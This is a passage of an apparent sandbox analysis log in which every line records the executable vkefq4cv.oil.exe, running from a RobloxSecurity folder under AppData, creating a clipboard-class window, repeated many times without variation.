                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
